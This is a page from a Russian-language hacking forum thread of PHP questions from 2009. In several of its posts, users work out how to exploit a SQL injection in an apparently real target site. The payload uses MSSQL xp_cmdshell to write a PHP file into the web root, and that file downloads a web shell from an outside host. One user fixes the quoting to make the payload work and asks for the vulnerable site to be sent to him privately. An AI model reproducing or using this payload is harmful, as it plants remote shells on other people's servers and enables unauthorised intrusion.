ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10971  
Старый 12.06.2009, 19:43
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Echo '$lolo';
 
Ответить с цитированием

  #10972  
Старый 12.06.2009, 20:31
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

"\$" обозначает символ "$" чтоб следующий текст не был интерполирован как переменная.

Последний раз редактировалось L I G A; 12.06.2009 в 20:34..
 
Ответить с цитированием

  #10973  
Старый 12.06.2009, 23:06
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

copy('http://bugaga.zapto.org/shell.txt','shell.php')

Как сделать так чтобы ковычки не замечала?
Я в том смысле что у меня ошибку пишет при выполнении (именно мешают ковычки)
Что делать? знак "\" перед ковычками не помогает(
 
Ответить с цитированием

  #10974  
Старый 13.06.2009, 00:10
Аватар для FireFenix
FireFenix
Постоянный
Регистрация: 03.06.2009
Сообщений: 385
Провел на форуме:
3178262

Репутация: 389
По умолчанию

Цитата:
Сообщение от diznt  
copy('http://bugaga.zapto.org/shell.txt','shell.php')

Как сделать так чтобы ковычки не замечала?
Я в том смысле что у меня ошибку пишет при выполнении (именно мешают ковычки)
Что делать? знак "\" перед ковычками не помогает(
Где оно замечает ковычки?
 
Ответить с цитированием

  #10975  
Старый 13.06.2009, 00:33
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

diznt, а можно поконкретнее? Ты юзаешь багу? Если да, то там, скорее всего, стоят мэджики, которые ты никак не обойдешь.
 
Ответить с цитированием

  #10976  
Старый 13.06.2009, 00:34
Аватар для DVD_RW
DVD_RW
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203

Репутация: 628


По умолчанию

Кто поможет дописать парсер\граббер ? почти всё написано ... точнее код был , но сейчас с донором что то не в порядке
контакты в пм или пишите в icq 45девять\девять3333 , +5 дам (:
 
Ответить с цитированием

  #10977  
Старый 13.06.2009, 00:35
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Цитата:
Сообщение от FireFenix  
Где оно замечает ковычки?
'; USE Master exec xp_cmdshell 'echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>" > C:\AppServ\www\shell1.php';--

Вроде через бд все это делаеться (дело все не в этом через что делаеться)

дело в том что команда сама не может выполниться так как ковычки присуствуют и они закрывают консольную команду
 
Ответить с цитированием

  #10978  
Старый 13.06.2009, 00:40
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

diznt, а что тебе мешает просто вместо одинарных двойные поставить и код изменить? Кста, это вообще хз что, а не код echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>
Код:
'; USE Master exec xp_cmdshell '<? file_put_contents("shell.php",file_get_contents("http://bugaga.zapto.org/shell.txt")); ?>' > C:\AppServ\www\shell1.php';--
Кста, скинь свою аську и уязвимость в пм, плз

http://forum.antichat.ru/private.php?do=newpm&userid=59362
 
Ответить с цитированием

  #10979  
Старый 13.06.2009, 00:51
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Цитата:
Сообщение от mailbrush  
diznt, а что тебе мешает просто вместо одинарных двойные поставить и код изменить? Кста, это вообще хз что, а не код echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>
Код:
'; USE Master exec xp_cmdshell '<? file_put_contents("shell.php",file_get_contents("http://bugaga.zapto.org/shell.txt")); ?>' > C:\AppServ\www\shell1.php';--
Кста, скинь свою аську и уязвимость в пм, плз

http://forum.antichat.ru/private.php?do=newpm&userid=59362
Спасибо попробую... А то я совсем забыл cmd команды
 
Ответить с цитированием

  #10980  
Старый 13.06.2009, 03:29
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

На сайте madnet.name/tools/madss/
есть такая штука что забиваешь туда сайт а он тебе высвечивает нектрые файлы которые доступны для просмотра (думаю поняли мою мысль)
Так вот как интересует откуда он это берет? (точнее откуда грабит)

Последний раз редактировалось diznt; 13.06.2009 в 03:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Delphi, .NET, Asm 5420 17.06.2010 13:33
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ